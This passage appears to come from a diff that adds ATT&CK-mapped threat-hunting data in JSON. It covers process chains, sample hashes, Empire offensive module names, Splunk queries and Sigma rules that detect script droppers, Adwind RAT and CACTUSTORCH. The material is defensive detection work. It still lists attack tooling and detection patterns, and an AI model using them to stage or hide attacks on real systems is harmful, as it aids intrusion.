"payloads": [ + "sandcat.go" + ] + } + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + 
"Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "service", + "relationship": "started", + "target_data_element": null + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "service", + "relationship": "stopped", + "target_data_element": null + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "service" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "service" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + 
"https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications", + "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + ] + ] + }, + { + "technique_id": "T1129", + "command_list": [ + "control.exe", + "malware.dll", + "rundll32.exe" + ], + "commands": [ + { + "command": "control.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "malware.dll", + "source": "Threat Hunting Tables", + "name": "loaded_dll" + }, + { + "command": "rundll32.exe", + "source": "Threat Hunting Tables", + "name": "sub_process_1" + } + ], + "parsed_datasets": [ + { + "chain_id": "100015", + "os": "windows", + "parent_process": "control.exe", + "commandline_string": "", + "sub_process_1": "rundll32.exe", + "sub_process_2": "", + "loaded_dll": "malware.dll", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "module_load", + "mitre_attack": "T1129", + "itw_sample": "" + } + ], + "queries": [], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "DLL monitoring" + ], + [ + "API monitoring" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "Sysmon ID 7", + "DLL monitoring" + ], + [ + "API monitoring" + ], + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": 
"process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ] + ] + }, + { + "technique_id": "T1064", + "command_list": [ + "cscript.exe", + "*.jse", + "*.vbe", + "*.js", + "*.vba", + "*.vbs", + "excel.exe", + "cmd.exe", + "wscript.exe", + "sh.exe", + "bash.exe", + "mshta.exe", + "powerpoint.exe", + "winword.exe", + "powershell.exe", + "csc.exe", + "cvtres.exe", + "javaw.exe", + "java.exe", + "wscript.exe|cscript.exe", + 
"powershell/code_execution/invoke_metasploitpayload", + "powershell/management/invoke_script", + "Creates and executes a simple bash script." + ], + "commands": [ + { + "command": "cscript.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "*.jse", + "source": "Threat Hunting Tables", + "name": "sub_process_1" + }, + { + "command": "*.vbe", + "source": "Threat Hunting Tables", + "name": "sub_process_1" + }, + { + "command": "*.js", + "source": "Threat Hunting Tables", + "name": "sub_process_1" + }, + { + "command": "*.vba", + "source": "Threat Hunting Tables", + "name": "sub_process_1" + }, + { + "command": "*.vbs", + "source": "Threat Hunting Tables", + "name": "sub_process_1" + }, + { + "command": "excel.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "cmd.exe", + "source": "Threat Hunting Tables", + "name": "sub_process_1" + }, + { + "command": "cscript.exe", + "source": "Threat Hunting Tables", + "name": "sub_process_1" + }, + { + "command": "wscript.exe", + "source": "Threat Hunting Tables", + "name": "sub_process_1" + }, + { + "command": "sh.exe", + "source": "Threat Hunting Tables", + "name": "sub_process_1" + }, + { + "command": "bash.exe", + "source": "Threat Hunting Tables", + "name": "sub_process_1" + }, + { + "command": "mshta.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "powerpoint.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "winword.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "powershell.exe", + "source": "Threat Hunting Tables", + "name": "sub_process_2" + }, + { + "command": "csc.exe", + "source": "Threat Hunting Tables", + "name": "sub_process_1" + }, + { + "command": "cvtres.exe", + "source": "Threat Hunting Tables", + "name": "sub_process_2" + }, + { + "command": "wscript.exe", + "source": "Threat Hunting Tables", + 
"name": "parent_process" + }, + { + "command": "javaw.exe", + "source": "Threat Hunting Tables", + "name": "sub_process_1" + }, + { + "command": "java.exe", + "source": "Threat Hunting Tables", + "name": "sub_process_2" + }, + { + "command": "wscript.exe|cscript.exe", + "source": "SysmonHunter - Scripting", + "name": "" + }, + { + "command": "powershell/code_execution/invoke_metasploitpayload", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/management/invoke_script", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "Creates and executes a simple bash script.", + "source": "Kirtar22/Litmus_Test", + "name": "" + } + ], + "parsed_datasets": [ + { + "chain_id": "100016", + "os": "windows", + "parent_process": "cscript.exe", + "commandline_string": "", + "sub_process_1": "*.jse", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + }, + { + "chain_id": "100017", + "os": "windows", + "parent_process": "cscript.exe", + "commandline_string": "", + "sub_process_1": "*.vbe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + }, + { + "chain_id": "100018", + "os": "windows", + "parent_process": "cscript.exe", + "commandline_string": "", + "sub_process_1": "*.js", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + 
"file_value": "", + "frequency": "rare", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "4bcc2af66d843614f1a8ef0daeb1987c08ff6a5c4a9930f9307f65b07f0888bd" + }, + { + "chain_id": "100019", + "os": "windows", + "parent_process": "cscript.exe", + "commandline_string": "", + "sub_process_1": "*.vba", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + }, + { + "chain_id": "100020", + "os": "windows", + "parent_process": "cscript.exe", + "commandline_string": "", + "sub_process_1": "*.vbs", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "9feb89d55680071ce79f32529591bd3d51536f9e08672cb79d0ab81b57cf905d" + }, + { + "chain_id": "100026", + "os": "windows", + "parent_process": "excel.exe", + "commandline_string": "", + "sub_process_1": "cmd.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "" + }, + { + "chain_id": "100027", + "os": "windows", + "parent_process": "excel.exe", + "commandline_string": "", + "sub_process_1": "cscript.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "" + }, + { + "chain_id": "100028", + "os": "windows", + "parent_process": "excel.exe", + "commandline_string": "", + "sub_process_1": "wscript.exe", + "sub_process_2": "", + "loaded_dll": "", + 
"registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "powershell", + "mitre_attack": "T1064", + "itw_sample": "" + }, + { + "chain_id": "100030", + "os": "windows", + "parent_process": "excel.exe", + "commandline_string": "", + "sub_process_1": "sh.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "" + }, + { + "chain_id": "100031", + "os": "windows", + "parent_process": "excel.exe", + "commandline_string": "", + "sub_process_1": "bash.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "" + }, + { + "chain_id": "100043", + "os": "windows", + "parent_process": "mshta.exe", + "commandline_string": "", + "sub_process_1": "cscript.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "6707264f01730f55c79379d75d29000fb44c92de99b8a1d58588e05963f3dea6" + }, + { + "chain_id": "100044", + "os": "windows", + "parent_process": "mshta.exe", + "commandline_string": "", + "sub_process_1": "wscript.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "aab57e55b04eb09ef97c7bc0c79d5c0ffeda557c7333777cd178adced03676cc" + }, + { + "chain_id": "100057", + "os": "windows", + "parent_process": "powerpoint.exe", + "commandline_string": "", + "sub_process_1": "cmd.exe", + "sub_process_2": "", + "loaded_dll": 
"", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "" + }, + { + "chain_id": "100058", + "os": "windows", + "parent_process": "powerpoint.exe", + "commandline_string": "", + "sub_process_1": "cscript.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "" + }, + { + "chain_id": "100059", + "os": "windows", + "parent_process": "powerpoint.exe", + "commandline_string": "", + "sub_process_1": "wscript.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "" + }, + { + "chain_id": "100061", + "os": "windows", + "parent_process": "powerpoint.exe", + "commandline_string": "", + "sub_process_1": "sh.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "" + }, + { + "chain_id": "100062", + "os": "windows", + "parent_process": "powerpoint.exe", + "commandline_string": "", + "sub_process_1": "bash.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "" + }, + { + "chain_id": "100088", + "os": "windows", + "parent_process": "winword.exe", + "commandline_string": "", + "sub_process_1": "cmd.exe", + "sub_process_2": "powershell.exe", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", 
+ "frequency": "rare", + "mitre_caption": "powershell", + "mitre_attack": "T1064", + "itw_sample": "1d20934083558bc5a23e57b4f14ec1147f19d23807e8956714b256ae64f9692c" + }, + { + "chain_id": "100089", + "os": "windows", + "parent_process": "winword.exe", + "commandline_string": "", + "sub_process_1": "cmd.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "" + }, + { + "chain_id": "100090", + "os": "windows", + "parent_process": "winword.exe", + "commandline_string": "", + "sub_process_1": "cscript.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "" + }, + { + "chain_id": "100091", + "os": "windows", + "parent_process": "winword.exe", + "commandline_string": "", + "sub_process_1": "wscript.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "" + }, + { + "chain_id": "100093", + "os": "windows", + "parent_process": "winword.exe", + "commandline_string": "", + "sub_process_1": "sh.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "" + }, + { + "chain_id": "100094", + "os": "windows", + "parent_process": "winword.exe", + "commandline_string": "", + "sub_process_1": "bash.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": 
"scripting", + "mitre_attack": "T1064", + "itw_sample": "" + }, + { + "chain_id": "100097", + "os": "windows", + "parent_process": "winword.exe", + "commandline_string": "", + "sub_process_1": "csc.exe", + "sub_process_2": "cvtres.exe", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "947ce5214919e4395a2454375972d37756e1162890c62b0bb30e2a4be9ddaf54" + }, + { + "chain_id": "100103", + "os": "windows", + "parent_process": "wscript.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "" + }, + { + "chain_id": "100104", + "os": "windows", + "parent_process": "wscript.exe", + "commandline_string": "", + "sub_process_1": "*.jse", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "" + }, + { + "chain_id": "100105", + "os": "windows", + "parent_process": "wscript.exe", + "commandline_string": "", + "sub_process_1": "*.vbe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "" + }, + { + "chain_id": "100106", + "os": "windows", + "parent_process": "wscript.exe", + "commandline_string": "", + "sub_process_1": "*.js", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "" + }, + { + 
"chain_id": "100107", + "os": "windows", + "parent_process": "wscript.exe", + "commandline_string": "", + "sub_process_1": "*.vba", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "" + }, + { + "chain_id": "100108", + "os": "windows", + "parent_process": "wscript.exe", + "commandline_string": "", + "sub_process_1": "*.vbs", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "" + }, + { + "chain_id": "100126", + "os": "windows", + "parent_process": "winword.exe", + "commandline_string": "", + "sub_process_1": "javaw.exe", + "sub_process_2": "java.exe", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "https://www.joesandbox.com/analysis/35201/0/html" + }, + { + "name": "Scripting", + "description": null, + "level": "high", + "phase": "Execution", + "query": [ + { + "type": "process", + "process": { + "any": { + "pattern": "wscript.exe|cscript.exe" + } + } + } + ] + }, + { + "Empire Module": "powershell/code_execution/invoke_metasploitpayload", + "ATT&CK Technique #1": "T1064", + "ATT&CK Technique #2": "", + "Technique": "Scripting", + "Concatenate for Python Dictionary": "\"powershell/code_execution/invoke_metasploitpayload\": [\"T1064\"]," + }, + { + "Empire Module": "powershell/management/invoke_script", + "ATT&CK Technique #1": "T1064", + "ATT&CK Technique #2": "", + "Technique": "Scripting", + "Concatenate for Python Dictionary": "\"powershell/management/invoke_script\": [\"T1064\"]," + } + ], + "queries": [ + { + "product": "Splunk", + "query": "index=linux 
sourcetype=linux_audit syscall=59 OR syscall=322 | table host,syscall,syscall_name,exe,auid", + "name": "" + }, + { + "product": "Splunk", + "query": "This could be very overwhelming if whitelisting is not done.", + "name": "" + } + ], + "possible_detections": [ + "auditlogs (audit.rules)", + { + "title": "WMIExec VBS Script", + "id": "966e4016-627f-44f7-8341-f394905c361f", + "description": "Detects suspicious file execution by wscript and cscript", + "author": "Florian Roth", + "references": [ + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf" + ], + "tags": [ + "attack.execution", + "attack.g0045", + "attack.t1064" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image": "*\\cscript.exe", + "CommandLine": "*.vbs /shell *" + }, + "condition": "selection" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "critical" + }, + { + "title": "CACTUSTORCH Remote Thread Creation", + "id": "2e4e488a-6164-4811-9ea1-f960c7359c40", + "description": "Detects remote thread creation from CACTUSTORCH as described in references.", + "references": [ + "https://twitter.com/SBousseaden/status/1090588499517079552", + "https://github.com/mdsecactivebreach/CACTUSTORCH" + ], + "status": "experimental", + "author": "@SBousseaden (detection), Thomas Patzke (rule)", + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 8, + "SourceImage": [ + "*\\System32\\cscript.exe", + "*\\System32\\wscript.exe", + "*\\System32\\mshta.exe", + "*\\winword.exe", + "*\\excel.exe" + ], + "TargetImage": "*\\SysWOW64\\\\*", + "StartModule": null + }, + "condition": "selection" + }, + "tags": [ + "attack.execution", + "attack.t1055", + "attack.t1064" + ], + "falsepositives": [ + "unknown" + ], + "level": "high" + }, + { + "title": "Suspicious File Characteristics due to Missing Fields", + "id": 
"9637e8a5-7131-4f7f-bdc7-2b05d8670c43", + "description": "Detects Executables without FileVersion,Description,Product,Company likely created with py2exe", + "status": "experimental", + "references": [ + "https://securelist.com/muddywater/88059/", + "https://www.virustotal.com/#/file/276a765a10f98cda1a38d3a31e7483585ca3722ecad19d784441293acf1b7beb/detection" + ], + "author": "Markus Neis", + "date": "2018/11/22", + "modified": "2019/11/09", + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1064" + ], + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection1": { + "Description": "\\?", + "FileVersion": "\\?" + }, + "selection2": { + "Description": "\\?", + "Product": "\\?" + }, + "selection3": { + "Description": "\\?", + "Company": "\\?" + }, + "condition": "1 of them" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "falsepositives": [ + "Unknown" + ], + "level": "medium" + }, + { + "action": "global", + "title": "Adwind RAT / JRAT", + "id": "1fac1481-2dbc-48b2-9096-753c49b4ec71", + "status": "experimental", + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "references": [ + "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", + "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf" + ], + "author": "Florian Roth, Tom Ueltschi", + "date": "2017/11/10", + "modified": "2018/12/11", + "tags": [ + "attack.execution", + "attack.t1064" + ], + "detection": { + "condition": "selection" + }, + "level": "high" + }, + { + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": [ + "*\\AppData\\Roaming\\Oracle*\\java*.exe *", + "*cscript.exe *Retrive*.vbs *" + ] + } + } + }, + { + "logsource": { + "product": "windows", + "service": "sysmon" + }, + 
"detection": { + "selection": { + "EventID": 11, + "TargetFilename": [ + "*\\AppData\\Roaming\\Oracle\\bin\\java*.exe", + "*\\Retrive*.vbs" + ] + } + } + }, + { + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 13, + "TargetObject": "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run*", + "Details": "%AppData%\\Roaming\\Oracle\\bin\\\\*" + } + } + }, + { + "title": "WScript or CScript Dropper", + "id": "cea72823-df4d-4567-950c-0b579eaf0846", + "status": "experimental", + "description": "Detects wscript/cscript executions of scripts located in user directories", + "author": "Margaritis Dimitrios (idea), Florian Roth (rule)", + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1064" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image": [ + "*\\wscript.exe", + "*\\cscript.exe" + ], + "CommandLine": [ + "* C:\\Users\\\\*.jse *", + "* C:\\Users\\\\*.vbe *", + "* C:\\Users\\\\*.js *", + "* C:\\Users\\\\*.vba *", + "* C:\\Users\\\\*.vbs *", + "* C:\\ProgramData\\\\*.jse *", + "* C:\\ProgramData\\\\*.vbe *", + "* C:\\ProgramData\\\\*.js *", + "* C:\\ProgramData\\\\*.vba *", + "* C:\\ProgramData\\\\*.vbs *" + ] + }, + "falsepositive": { + "ParentImage": "*\\winzip*" + }, + "condition": "selection and not falsepositive" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "falsepositives": [ + "Winzip", + "Other self-extractors" + ], + "level": "high" + }, + { + "title": "Windows Shell Spawning Suspicious Program", + "id": "3a6586ad-127a-4d3b-a677-1e6eacdf8fde", + "status": "experimental", + "description": "Detects a suspicious child process of a Windows shell", + "references": [ + "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html" + ], + "author": "Florian Roth", + "date": "2018/04/06", + "modified": "2019/02/05", + "tags": [ + "attack.execution", + 
"attack.defense_evasion", + "attack.t1064" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "ParentImage": [ + "*\\mshta.exe", + "*\\powershell.exe", + "*\\rundll32.exe", + "*\\cscript.exe", + "*\\wscript.exe", + "*\\wmiprvse.exe" + ], + "Image": [ + "*\\schtasks.exe", + "*\\nslookup.exe", + "*\\certutil.exe", + "*\\bitsadmin.exe", + "*\\mshta.exe" + ] + }, + "falsepositives": { + "CurrentDirectory": "*\\ccmcache\\\\*" + }, + "condition": "selection and not falsepositives" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "falsepositives": [ + "Administrative scripts", + "Microsoft SCCM" + ], + "level": "high" + }, + { + "title": "Suspicious RASdial Activity", + "id": "6bba49bf-7f8c-47d6-a1bb-6b4dece4640e", + "description": "Detects suspicious process related to rasdial.exe", + "status": "experimental", + "references": [ + "https://twitter.com/subTee/status/891298217907830785" + ], + "author": "juju4", + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1064" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": [ + "rasdial" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "level": "medium" + }, + { + "title": "WSF/JSE/JS/VBA/VBE File Execution", + "id": "1e33157c-53b1-41ad-bbcc-780b80b58288", + "status": "experimental", + "description": "Detects suspicious file execution by wscript and cscript", + "author": "Michael Haag", + "tags": [ + "attack.execution", + "attack.t1064" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image": [ + "*\\wscript.exe", + "*\\cscript.exe" + ], + "CommandLine": [ + "*.jse", + "*.vbe", + "*.js", + "*.vba" + ] + }, + "condition": "selection" + }, + "fields": [ + 
